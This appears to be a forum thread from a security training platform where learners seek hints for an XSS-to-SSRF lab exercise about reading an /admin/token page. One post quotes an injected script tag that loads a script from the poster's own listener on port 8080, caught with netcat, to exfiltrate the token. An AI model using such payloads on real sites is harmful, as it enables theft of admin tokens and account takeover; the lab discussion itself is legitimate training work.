Forum Discussion
shubham
Bronze I
10 months agoCross-Site Scripting: Ep.6 – Further Exploitation
I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
- 9 months ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.
natelott
Bronze I
10 months agoHaving the same issues. Script is running, but /admin/token immediately redirects back to /dashboard. Executed JS code in console and it returns html from /dashboard.
Created script.js on VM. Running netcat instance on port 8080 to handle HTTP request. I can see the request occur in terminal. Token not returned.
Command being used in message field: <script src="http://0.0.0.0:8080/script.js"></script>